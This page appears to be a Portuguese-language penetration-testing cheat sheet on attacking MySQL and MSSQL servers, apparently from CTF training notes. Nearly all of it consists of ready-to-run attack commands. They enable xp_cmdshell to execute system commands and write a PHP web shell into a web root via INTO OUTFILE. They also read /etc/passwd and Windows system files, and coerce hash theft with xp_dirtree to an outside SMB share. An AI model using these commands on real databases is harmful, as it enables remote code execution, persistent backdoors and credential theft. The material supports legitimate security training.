LinkedinTryHackme

SQL Databases

MySQL e Microsoft SQL Server ( MSSQL) são sistemas de gerenciamento de banco de dados relacional que armazenam dados em tabelas, colunas e linhas. Muitos sistemas de banco de dados relacional como MSSQL e MySQL usam a Structured Query Language ( SQL) para consultar e manter o banco de dados.

  • MSSQL PORT : TCP and UDP 1433

  • MySQL PORT : TCP 3306

  • Banner Grabbing

nmap -Pn -sV -sC -p1433 10.10.10.125

  • MySQL - Conectando ao SQL Server

mysql -u julio -pPassword123 -h 10.129.20.13

  • Sqlcmd - Conectando ao SQL Server

sqlcmd -S SRVMSSQL -U julio -P 'MyPassword!' -y 30 -Y 30

  • Se estivermos mirando MSSQLno Linux, podemos usar sqshcomo alternativa sqlcmd:

sqsh -S 10.129.203.7 -U julio -P 'MyPassword!' -h

  • Alternativamente, podemos usar a ferramenta do Impacket com o nome mssqlclient.py.

mssqlclient.py -p 1433 julio@10.129.203.7

  • Conectando-se ao servidor MSSQL a partir do Linux enquanto o mecanismo de autenticação do Windows é usado pelo servidor MSSQL.

sqsh -S 10.129.203.7 -U .\\julio -P 'MyPassword!' -h

  • Mostrar todos os bancos de dados disponíveis no MySQL.

mysql> SHOW DATABASES;

  • Selecione um banco de dados específico no MySQL.

mysql> USE htbusers;

  • Mostrar todas as tabelas disponíveis no banco de dados selecionado no MySQL.

mysql> SHOW TABLES;

  • Selecione todas as entradas disponíveis da tabela "users" no MySQL.

mysql> SELECT * FROM users;

  • Mostrar todos os bancos de dados disponíveis no MSSQL.

sqlcmd> SELECT name FROM master.dbo.sysdatabases

  • Selecione um banco de dados específico no MSSQL.

sqlcmd> USE htbusers

  • Mostrar todas as tabelas disponíveis no banco de dados selecionado no MSSQL.

sqlcmd> SELECT * FROM htbusers.INFORMATION_SCHEMA.TABLES

  • Selecione todas as entradas disponíveis da tabela "usuários" no MSSQL.

sqlcmd> SELECT * FROM users

  • Para permitir que opções avançadas sejam alteradas.

sqlcmd> EXECUTE sp_configure 'show advanced options', 1

  • Para habilitar o xp_cmdshell.

sqlcmd> EXECUTE sp_configure 'xp_cmdshell', 1

  • Para ser usado após cada comando sp_configure para aplicar as alterações.

sqlcmd> RECONFIGURE

  • Execute um comando do sistema a partir do servidor MSSQL.

sqlcmd> xp_cmdshell 'whoami'

  • Crie um arquivo usando MySQL.

mysql> SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php'

  • Verifique se os privilégios de arquivo seguro estão vazios para ler arquivos armazenados localmente no sistema.

mysql> show variables like "secure_file_priv";

  • Leia arquivos locais no MSSQL.

sqlcmd> SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents

  • Leia arquivos locais no MySQL.

mysql> select LOAD_FILE("/etc/passwd");

  • Roubo de hash usando o xp_dirtreecomando no MSSQL.

sqlcmd> EXEC master..xp_dirtree '\\10.10.110.17\share\'

  • Roubo de hash usando o xp_subdirscomando no MSSQL.

sqlcmd> EXEC master..xp_subdirs '\\10.10.110.17\share\'

  • Identificar servidores vinculados no MSSQL.

sqlcmd> SELECT srvname, isremote FROM sysservers

  • Identifique o usuário e seus privilégios usados ​​para a conexão remota no MSSQL.

sqlcmd> EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\SQLEXPRESS]
PreviousQuestionsNextRDP

Last updated